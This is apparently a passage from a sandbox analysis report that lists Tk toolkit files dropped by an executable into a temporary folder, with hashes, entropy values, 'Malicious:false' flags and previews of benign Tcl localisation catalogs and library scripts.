                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:namespace eval ::tk {. ::msgcat::mcset eo "&Abort" "&\u0108esigo". ::msgcat::mcset eo "&About..." "Pri...". ::msgcat::mcset eo "All Files" "\u0108ioj dosieroj". ::msgcat::mcset eo "Application Error" "Aplikoerraro". ::msgcat::mcset eo "&Blue" "&Blua". ::msgcat::mcset eo "&Cancel" "&Rezignu". ::msgcat::mcset eo "Cannot change to the directory \"%1\$s\".\nPermission denied." "Neeble \u0109angi al dosierulon \"%1\$s\".\nVi ne rajtas tion.". ::msgcat::mcset eo "Choose Directory" "Elektu Dosierujo". ::msgcat::mcset eo "&Clear" "&Klaru". ::msgcat::mcset eo "&Clear Console" "&Klaru konzolon". ::msgcat::mcset eo "Color" "Farbo". ::msgcat::mcset eo "Console" "Konzolo". ::msgcat::mcset eo "&Copy" "&Kopiu". ::msgcat::mcset eo "Cu&t" "&Enpo\u015digu". ::msgcat::mcset eo "&Delete" "&Forprenu". ::msgcat::mcset eo "Details >>" "Detaloj >>". ::msgcat::mcset eo "Directory \"%1\$s\" does not exist." "La dosierujo \"%1\$s\" ne ekzistas.". ::msgcat::mc

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\msgs\es.msg

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):3924
                                                                                                                                                                                                                                                    Entropy (8bit):4.499108281229709
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:vTE1U2XR5GiWXirZe0uoH0KQyTaBi2DcDmQ/jY33lEzTCyfv:volXgFHyGB3ELxDH
                                                                                                                                                                                                                                                    MD5:4C1B749AC7182F4F4AE0B1D17356BDE0
                                                                                                                                                                                                                                                    SHA1:1843D238DEC98DEC543FE2AF8C392CD461DD0A72
                                                                                                                                                                                                                                                    SHA-256:F9D5D6C76D7AF1431C332186CB9FABB2F47A98E8A970265DF312222BA6F59C0A
                                                                                                                                                                                                                                                    SHA-512:610C4C4C26B750171304B34BA3BE501B9F2CFC252CEB40A1FA181A3087C07D6741106609A77A32BD3EFB8FF4F548852022FEF4B77159E2F01B4202E6BCC995AF
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:namespace eval ::tk {. ::msgcat::mcset es "&Abort" "&Abortar". ::msgcat::mcset es "&About..." "&Acerca de ...". ::msgcat::mcset es "All Files" "Todos los archivos" . ::msgcat::mcset es "Application Error" "Error de la aplicaci\u00f3n". ::msgcat::mcset es "&Blue" "&Azul". ::msgcat::mcset es "&Cancel" "&Cancelar". ::msgcat::mcset es "Cannot change to the directory \"%1\$s\".\nPermission denied." "No es posible acceder al directorio \"%1\$s\".\nPermiso denegado.". ::msgcat::mcset es "Choose Directory" "Elegir directorio". ::msgcat::mcset es "Cl&ear" "&Borrar". ::msgcat::mcset es "&Clear Console" "&Borrar consola". ::msgcat::mcset es "Color" "Color". ::msgcat::mcset es "Console" "Consola". ::msgcat::mcset es "&Copy" "&Copiar". ::msgcat::mcset es "Cu&t" "Cor&tar". ::msgcat::mcset es "&Delete" "&Borrar". ::msgcat::mcset es "Details >>" "Detalles >>". ::msgcat::mcset es "Directory \"%1\$s\" does not exist." "El directorio \"%1\$s\" no existe.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\msgs\fr.msg

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):3727
                                                                                                                                                                                                                                                    Entropy (8bit):4.582588432323347
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:fkErYNxfhFBqFHjApxKSOzbgRujzSAEFlBGr3jd:fkErYLpaV0KSHtXcN
                                                                                                                                                                                                                                                    MD5:2C904D110BA900583A86838AE264438C
                                                                                                                                                                                                                                                    SHA1:CC7C444BDA43FD5EBE0B00F68BAD42E7DFB816C2
                                                                                                                                                                                                                                                    SHA-256:E7BA2F7A95679695504164C92B86B92AB5F7D08DCF34029E391C1683AC9FF5F3
                                                                                                                                                                                                                                                    SHA-512:B6FBB18C061EC990BCD3120D80A0A5794B4935FFF9EE6CBF5FD231BFD0C0F1772620E11877C91D34F7FA8C5FEE71BD15C3330017C437F4DE66751D97D8BB7208
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:namespace eval ::tk {. ::msgcat::mcset fr "&Abort" "&Annuler". ::msgcat::mcset fr "About..." "\u00c0 propos...". ::msgcat::mcset fr "All Files" "Tous les fichiers". ::msgcat::mcset fr "Application Error" "Erreur d'application". ::msgcat::mcset fr "&Blue" "&Bleu". ::msgcat::mcset fr "&Cancel" "&Annuler". ::msgcat::mcset fr "Cannot change to the directory \"%1\$s\".\nPermission denied." "Impossible d'acc\u00e9der au r\u00e9pertoire \"%1\$s\".\nPermission refus\u00e9e.". ::msgcat::mcset fr "Choose Directory" "Choisir r\u00e9pertoire". ::msgcat::mcset fr "Clear" "Effacer". ::msgcat::mcset fr "Color" "Couleur". ::msgcat::mcset fr "Console". ::msgcat::mcset fr "Copy" "Copier". ::msgcat::mcset fr "Cut" "Couper". ::msgcat::mcset fr "Delete" "Effacer". ::msgcat::mcset fr "Details >>" "D\u00e9tails >>". ::msgcat::mcset fr "Directory \"%1\$s\" does not exist." "Le r\u00e9pertoire \"%1\$s\" n'existe pas.". ::msgcat::mcset fr "&Directory:" "&R\u00e

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\msgs\hu.msg

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):4588
                                                                                                                                                                                                                                                    Entropy (8bit):4.764869147275923
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:GwCzxSy0Kt9C81m/HSzVqUaJf9q/x5a/mETsN:G31RCx/4vZM+EA
                                                                                                                                                                                                                                                    MD5:7045E373D8E5A7D379AF004C5616313B
                                                                                                                                                                                                                                                    SHA1:16D7B17FBF71234989BF356655D6D43C271A020F
                                                                                                                                                                                                                                                    SHA-256:76453FEC72C59FD85648036B5B9FC983D7279CEC5818295E0451CF83CF7D264F
                                                                                                                                                                                                                                                    SHA-512:F260A7D61E17ECDF52F6C36E4BBA3F881079490CDB3DCA380CE34D0012B98F9FA96550557BC6BCE267594CCD9BB63A94F45C329B25FF66144223833A5A79EB0D
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:namespace eval ::tk {. ::msgcat::mcset hu "&Abort" "&Megszak\u00edt\u00e1s". ::msgcat::mcset hu "About..." "N\u00e9vjegy...". ::msgcat::mcset hu "All Files" "Minden f\u00e1jl". ::msgcat::mcset hu "All Files (*) " "Minden f\u00e1jl (*) ". ::msgcat::mcset hu "Application Error" "Alkalmaz\u00e1s hiba". ::msgcat::mcset hu "&Blue" "&K\u00e9k". ::msgcat::mcset hu "&Cancel" "M\u00e9g&sem". ::msgcat::mcset hu "Cannot change to the directory \"%1\$s\".\nPermission denied." "A k\u00f6nyvt\u00e1rv\u00e1lt\u00e1s nem siker\u00fclt: \"%1\$s\".\nHozz\u00e1f\u00e9r\u00e9s megtagadva.". ::msgcat::mcset hu "Choose Directory" "K\u00f6nyvt\u00e1r kiv\u00e1laszt\u00e1sa". ::msgcat::mcset hu "Clear" "T\u00f6rl\u00e9s". ::msgcat::mcset hu "&Clear Console" "&T\u00f6rl\u00e9s Konzol". ::msgcat::mcset hu "Color" "Sz\u00edn". ::msgcat::mcset hu "Console" "Konzol". ::msgcat::mcset hu "&Copy" "&M\u00e1sol\u00e1s". ::msgcat::mcset hu "Cu&t" "&Kiv\u00e1g\u00e1s". ::ms

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\msgs\it.msg

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):3557
                                                                                                                                                                                                                                                    Entropy (8bit):4.44160619394425
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:rpcxYo3XRzvjbhWsHTTYTxDllvOr80nC2dnGHc839kUqg:9caodbhlHYTxDlcY0HpVg
                                                                                                                                                                                                                                                    MD5:4396605B50C75E6F7FA1C3FBD6A42799
                                                                                                                                                                                                                                                    SHA1:5ABC6C66208FF596F49A7C576EBB30D0773F1EA0
                                                                                                                                                                                                                                                    SHA-256:2E0FA36F75B191A2FEE3331EC0215A68DD913D62C2680555C21008286150A58F
                                                                                                                                                                                                                                                    SHA-512:74A25EE87C2E8AD6B37BA5B17CA4B31474D71E953E7E896AF90CCC6A49CA48F503D93771A8FB947351ECEDCC40A4B1EDDE01E278442195235105C617DC8F3CA1
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:namespace eval ::tk {. ::msgcat::mcset it "&Abort" "&Interrompi". ::msgcat::mcset it "About..." "Informazioni...". ::msgcat::mcset it "All Files" "Tutti i file". ::msgcat::mcset it "Application Error" "Errore dell' applicazione". ::msgcat::mcset it "&Blue" "&Blu". ::msgcat::mcset it "&Cancel" "&Annulla". ::msgcat::mcset it "Cannot change to the directory \"%1\$s\".\nPermission denied." "Impossibile accedere alla directory \"%1\$s\".\nPermesso negato.". ::msgcat::mcset it "Choose Directory" "Scegli una directory". ::msgcat::mcset it "Clear" "Azzera". ::msgcat::mcset it "Color" "Colore". ::msgcat::mcset it "Console". ::msgcat::mcset it "Copy" "Copia". ::msgcat::mcset it "Cut" "Taglia". ::msgcat::mcset it "Delete" "Cancella". ::msgcat::mcset it "Details >>" "Dettagli >>". ::msgcat::mcset it "Directory \"%1\$s\" does not exist." "La directory \"%1\$s\" non esiste.". ::msgcat::mcset it "&Directory:". ::msgcat::mcset it "Error: %1\$s" "Er

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\msgs\nl.msg

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7095
                                                                                                                                                                                                                                                    Entropy (8bit):4.65919646196926
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:/TTnlMN3O70KFuQbL/Zs4g0GcNhHOx/bRHsa1EHL3YRYt:SRh3ILhsKQuLjt
                                                                                                                                                                                                                                                    MD5:072E12F026647B15649ADB045847A5C2
                                                                                                                                                                                                                                                    SHA1:1840B96A80AC1506B0510679EAB56FD799E7DCE1
                                                                                                                                                                                                                                                    SHA-256:245A493CC77648861F3629286BDA153E2B6BF0E2499BB321FA7B18951F05BB7C
                                                                                                                                                                                                                                                    SHA-512:D0E996662146BA431FDDE8DDD0DCC415240BAE2D66FB698AABBB6F40E9CC6B2E5298351B12BCBB187310A0F4B8B80B1BF84FFE186C9191334C66E71B2CB161E4
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:namespace eval ::tk {. ::msgcat::mcset nl "\"%1\$s\" must be an absolute pathname" "\"%1\$s\" moet een absolute pad-naam zijn". ::msgcat::mcset nl "%1\$s is not a toplevel window" "%1\$s is geen toplevel window". ::msgcat::mcset nl ", or" ", of". ::msgcat::mcset nl "-default, -icon, -message, -parent, -title, or -type" "-default, -icon, -message, -parent, -title, of -type". ::msgcat::mcset nl "-initialdir, -mustexist, -parent, or -title" "-initialdir, -mustexist, -parent, of -title". ::msgcat::mcset nl "&Abort" "&Afbreken". ::msgcat::mcset nl "About..." "Over...". ::msgcat::mcset nl "All Files" "Alle Bestanden". ::msgcat::mcset nl "Application Error" "Toepassingsfout". ::msgcat::mcset nl "&Blue" "&Blauw". ::msgcat::mcset nl "&Cancel" "&Annuleren". ::msgcat::mcset nl "Cannot change to the directory \"%1\$s\".\nPermission denied." "Kan niet naar map \"%1\$s\" gaan.\nU heeft hiervoor geen toestemming.". ::msgcat::mcset nl "Choose Directory" "Kies map

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\msgs\pl.msg

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):3952
                                                                                                                                                                                                                                                    Entropy (8bit):4.771874654651666
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:mYkv1H+BBv5vVXnjB+y7oBUHHE3XQrDool2EQdWa0ybBhKG:zsH+3vLNnZHHE3XjoFYhL
                                                                                                                                                                                                                                                    MD5:E28545F6A7B22EC237AE53C8F12A83C8
                                                                                                                                                                                                                                                    SHA1:0BF3A4827B93D63934A099F935A484B9E101168E
                                                                                                                                                                                                                                                    SHA-256:84F6D2498AA1438706BD9665918754275BE7FA0099CFB8A8601AE1F79915C6F0
                                                                                                                                                                                                                                                    SHA-512:0B1FDE2B6412162361041745E288902800D72E6B1B0606B362047F0E7C9A39459660F6BB9AEA35D4CED7F225158BB0A944C2D81F731169253F6B456C9EFFFB49
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:namespace eval ::tk {. ::msgcat::mcset pl "&Abort" "&Przerwij". ::msgcat::mcset pl "&About..." "O programie...". ::msgcat::mcset pl "All Files" "Wszystkie pliki". ::msgcat::mcset pl "Application Error" "B\u0142\u0105d w programie". ::msgcat::mcset pl "&Blue" "&Niebieski". ::msgcat::mcset pl "&Cancel" "&Anuluj". ::msgcat::mcset pl "Cannot change to the directory \"%1\$s\".\nPermission denied." "Nie mo\u017cna otworzy\u0107 katalogu \"%1\$s\".\nOdmowa dost\u0119pu.". ::msgcat::mcset pl "Choose Directory" "Wybierz katalog". ::msgcat::mcset pl "Cl&ear" "&Wyczy\u015b\u0107". ::msgcat::mcset pl "&Clear Console" "&Wyczy\u015b\u0107 konsol\u0119". ::msgcat::mcset pl "Color" "Kolor". ::msgcat::mcset pl "Console" "Konsola". ::msgcat::mcset pl "&Copy" "&Kopiuj". ::msgcat::mcset pl "Cu&t" "&Wytnij". ::msgcat::mcset pl "&Delete" "&Usu\u0144". ::msgcat::mcset pl "Details >>" "Szczeg\u00f3\u0142y >>". ::msgcat::mcset pl "Directory \"%1\$s\" does not

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\msgs\pt.msg

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):3973
                                                                                                                                                                                                                                                    Entropy (8bit):4.677862734107109
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:YmBmHHCnBbrvRjfgxtilIUkQIPlYwCC4x+hrmK1VZi:YmAncxVMtiXkPl2xomUQ
                                                                                                                                                                                                                                                    MD5:1F04930642B3F4A9F16F11CC674B56A7
                                                                                                                                                                                                                                                    SHA1:1AF829DD0A4175AF35DED50F530B4285F7A174FB
                                                                                                                                                                                                                                                    SHA-256:611FE4FEB0FB3A8D7BADA328B6AF65C5BE9704DF334BCCD55B5E736EAA0A898F
                                                                                                                                                                                                                                                    SHA-512:BCA4FF7F102C9AEE0BB306C5E8A34290AB7D3C7D9948809B8F31064BA5F20A7DE9EAE2D61201E602136A27B24BAEFB2C950F04AA766DA46C6025E79B1AF86DC3
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:namespace eval ::tk {. ::msgcat::mcset pt_br "&Abort" "&Abortar". ::msgcat::mcset pt_br "About..." "Sobre ...". ::msgcat::mcset pt_br "All Files" "Todos os arquivos". ::msgcat::mcset pt_br "Application Error" "Erro de aplica\u00e7\u00e3o". ::msgcat::mcset pt_br "&Blue" "&Azul". ::msgcat::mcset pt_br "&Cancel" "&Cancelar". ::msgcat::mcset pt_br "Cannot change to the directory \"%1\$s\".\nPermission denied." "N\u00e3o foi poss\u00edvel mudar para o diret\u00f3rio \"%1\$s\".\nPermiss\u00e3o negada.". ::msgcat::mcset pt_br "Choose Directory" "Escolha um diret\u00f3rio". ::msgcat::mcset pt_br "Clear" "Apagar". ::msgcat::mcset pt_br "Color" "Cor". ::msgcat::mcset pt_br "Console" "Console". ::msgcat::mcset pt_br "Copy" "Copiar". ::msgcat::mcset pt_br "Cut" "Recortar". ::msgcat::mcset pt_br "Delete" "Excluir". ::msgcat::mcset pt_br "Details >>" "Detalhes >>". ::msgcat::mcset pt_br "Directory \"%1\$s\" does not exist." "O diret\u00f3rio \"%1\$s\"

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\msgs\ru.msg

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7105
                                                                                                                                                                                                                                                    Entropy (8bit):4.353661356769555
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:NUEBGhT4YsVL3L7Pkhx2xSrw02lOzFAnxS/j49cD/qRjGSQvN8Nfo5hgV9aoTRZ/:grAPJGF8mq+WRKOGcRmRu
                                                                                                                                                                                                                                                    MD5:202DC42C5DA0F0ACA88B1B4C30E5381B
                                                                                                                                                                                                                                                    SHA1:9A7CC7AFBDF37C7937589E7F212ABC6E3F260D55
                                                                                                                                                                                                                                                    SHA-256:45369C1C8853EE34C5B65C742C6AC3E03E1399E64C0958B5E4E4A927E8D30310
                                                                                                                                                                                                                                                    SHA-512:DE6C9601010A51AAB380FD353849D91F47FFE9087DE524DA2DEBA30FF63EDF8C83FE471F8B9D733576B9732ABD881CD1D411BB1A04A0EC25CE8CFE08716C597E
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:namespace eval ::tk {. ::msgcat::mcset ru "&Abort" "&\u041e\u0442\u043c\u0435\u043d\u0438\u0442\u044c". ::msgcat::mcset ru "About..." "\u041f\u0440\u043e...". ::msgcat::mcset ru "All Files" "\u0412\u0441\u0435 \u0444\u0430\u0439\u043b\u044b". ::msgcat::mcset ru "Application Error" "\u041e\u0448\u0438\u0431\u043a\u0430 \u0432 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0435". ::msgcat::mcset ru "&Blue" " &\u0413\u043e\u043b\u0443\u0431\u043e\u0439". ::msgcat::mcset ru "&Cancel" "\u041e\u0442&\u043c\u0435\u043d\u0430". ::msgcat::mcset ru "Cannot change to the directory \"%1\$s\".\nPermission denied." \...."\u041d\u0435 \u043c\u043e\u0433\u0443 \u043f\u0435\u0440\u0435\u0439\u0442\u0438 \u0432 \u043a\u0430\u0442\u0430\u043b\u043e\u0433 \"%1\$s\".\n\u041d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e \u043f\u0440\u0430\u0432 \u0434\u043e\u0441\u0442\u0443\u043f\u0430". ::msgcat::mcset ru "Choose Directory" "\u0412\u044b\u0431\u0435\u0440\u0

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\msgs\sv.msg

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):3762
                                                                                                                                                                                                                                                    Entropy (8bit):4.613765855030883
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:g4H5cNWBJdE10M4/0Uli6z8XIxTB2iDxypdmmZbWxOt:F5cN6H0Uli9IxTEbQsb7t
                                                                                                                                                                                                                                                    MD5:9835887AE45B8D5B57D0B8ACF303C4B3
                                                                                                                                                                                                                                                    SHA1:DC26BF315FB83212983D2532BC2ABB26A4987F5A
                                                                                                                                                                                                                                                    SHA-256:3965322893101F480693D45AD365D05CC31099CBE23F5A810C94E2E14D0B6D27
                                                                                                                                                                                                                                                    SHA-512:23E5F222F598DFE26B7D341B6ECD4B0E2240B3B7776063E089DEE4409880398BBFAFF3BCF9A0E8F6CBDA3E66FD193B07C9255A6B2DFCBC7352943D100337E396
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:namespace eval ::tk {. ::msgcat::mcset sv "&Abort" "&Avsluta". ::msgcat::mcset sv "&About..." "&Om...". ::msgcat::mcset sv "All Files" "Samtliga filer". ::msgcat::mcset sv "Application Error" "Programfel". ::msgcat::mcset sv "&Blue" "&Bl\u00e5". ::msgcat::mcset sv "&Cancel" "&Avbryt". ::msgcat::mcset sv "Cannot change to the directory \"%1\$s\".\nPermission denied." "Kan ej n\u00e5 mappen \"%1\$s\".\nSaknar r\u00e4ttigheter.". ::msgcat::mcset sv "Choose Directory" "V\u00e4lj mapp". ::msgcat::mcset sv "&Clear" "&Radera". ::msgcat::mcset sv "&Clear Console" "&Radera konsollen". ::msgcat::mcset sv "Color" "F\u00e4rg". ::msgcat::mcset sv "Console" "Konsoll". ::msgcat::mcset sv "&Copy" "&Kopiera". ::msgcat::mcset sv "Cu&t" "Klipp u&t". ::msgcat::mcset sv "&Delete" "&Radera". ::msgcat::mcset sv "Details >>" "Detaljer >>". ::msgcat::mcset sv "Directory \"%1\$s\" does not exist." "Mappen \"%1\$s\" finns ej.". ::msgcat::mcset sv "&Directory:

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\obsolete.tcl

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):5594
                                                                                                                                                                                                                                                    Entropy (8bit):4.9941618573215525
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:oz4CrtmsXVwM3Er4VAEQ93NZB1o+IFF5ZYi4GUoLf33yLLddzA:oUCrtmsFREEs999o7FF5ZYi4GjLfS/d2
                                                                                                                                                                                                                                                    MD5:7763C90F811620A6C1F0A36BAF9B89CA
                                                                                                                                                                                                                                                    SHA1:30E24595DD683E470FE9F12814D27D6D266B511E
                                                                                                                                                                                                                                                    SHA-256:F6929A5E0D18BC4C6666206C63AC4AAA66EDC4B9F456DFC083300CFA95A44BCD
                                                                                                                                                                                                                                                    SHA-512:2E2887392C67D05EA85DB2E6BFD4AA27779BC82D3B607A7DD221A99EFF0D2A21A6BA47A4F2D2CDFC7CFECD7E93B2B38064C4D5A51406471AE142EC9CC71F5C48
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# obsolete.tcl --.#.# This file contains obsolete procedures that people really shouldn't.# be using anymore, but which are kept around for backward compatibility..#.# Copyright (c) 1994 The Regents of the University of California..# Copyright (c) 1994 Sun Microsystems, Inc..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..# The procedures below are here strictly for backward compatibility with.# Tk version 3.6 and earlier. The procedures are no longer needed, so.# they are no-ops. You should not use these procedures anymore, since.# they may be removed in some future release...proc tk_menuBar args {}.proc tk_bindForTraversal args {}..# ::tk::classic::restore --.#.# Restore the pre-8.5 (Tk classic) look as the widget defaults for classic.# Tk widgets..#.# The value following an 'option add' call is the new 8.5 value..#.namespace eval ::tk::classic {. # This may need to be adjusted for some windo

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\optMenu.tcl

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1586
                                                                                                                                                                                                                                                    Entropy (8bit):4.733749898743743
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:k2hguC4Zxk+Z0cIWR3afbR1EIC+KtVa+6WX13jZQl9:k6T9N3atqIkeS9FQD
                                                                                                                                                                                                                                                    MD5:D17FE676A057F373B44C9197114F5A69
                                                                                                                                                                                                                                                    SHA1:9745C83EEC8565602F8D74610424848009FFA670
                                                                                                                                                                                                                                                    SHA-256:76DBDBF9216678D48D1640F8FD1E278E7140482E1CAC7680127A9A425CC61DEE
                                                                                                                                                                                                                                                    SHA-512:FF7D9EB64D4367BB11C567E64837CB1DAAA9BE0C8A498CAD00BF63AF45C1826632BC3A09E65D6F51B26EBF2D07285802813ED55C5D697460FC95AF30A943EF8F
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# optMenu.tcl --.#.# This file defines the procedure tk_optionMenu, which creates.# an option button and its associated menu..#.# Copyright (c) 1994 The Regents of the University of California..# Copyright (c) 1994 Sun Microsystems, Inc..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..# ::tk_optionMenu --.# This procedure creates an option button named $w and an associated.# menu. Together they provide the functionality of Motif option menus:.# they can be used to select one of many values, and the current value.# appears in the global variable varName, as well as in the text of.# the option menubutton. The name of the menu is returned as the.# procedure's result, so that the caller can use it to change configuration.# options on the menu or otherwise manipulate it..#.# Arguments:.# w -...The name to use for the menubutton..# varName -..Global variable to hold the currently selected value..# first

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\palette.tcl

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7869
                                                                                                                                                                                                                                                    Entropy (8bit):4.892883872925194
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:ZUWLyUd51URCJWgWWWuWVWMKoDOdn6jLDlJymGH91QOWJCy3XZQRr:ZLFaCI3dFU3Pdn6P69WJor
                                                                                                                                                                                                                                                    MD5:980BDB3834EF4B7673DA11F5ED215207
                                                                                                                                                                                                                                                    SHA1:D1FBB465506C7AE7157939D901FC669555A1E7EB
                                                                                                                                                                                                                                                    SHA-256:2757E39663269ED2A02F3A6E0599AD5F38D1EEF08082A4660F3C7AC2AAFF2317
                                                                                                                                                                                                                                                    SHA-512:775E332863FC269E7802D885101069F4765DB90A601F866688E5424E9B3A695CEB023DE354BFF44294F72B034D1DE8924160ADEA0C13EC24427424E67DCF7CF8
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# palette.tcl --.#.# This file contains procedures that change the color palette used.# by Tk..#.# Copyright (c) 1995-1997 Sun Microsystems, Inc..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..# ::tk_setPalette --.# Changes the default color scheme for a Tk application by setting.# default colors in the option database and by modifying all of the.# color options for existing widgets that have the default value..#.# Arguments:.# The arguments consist of either a single color name, which.# will be used as the new background color (all other colors will.# be computed from this) or an even number of values consisting of.# option names and values. The name for an option is the one used.# for the option database, such as activeForeground, not -activeforeground...proc ::tk_setPalette {args} {. if {[winfo depth .] == 1} {..# Just return on monochrome displays, otherwise errors will occur..return. }.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\panedwindow.tcl

                                                                                                                                                                                                                                                    Download File
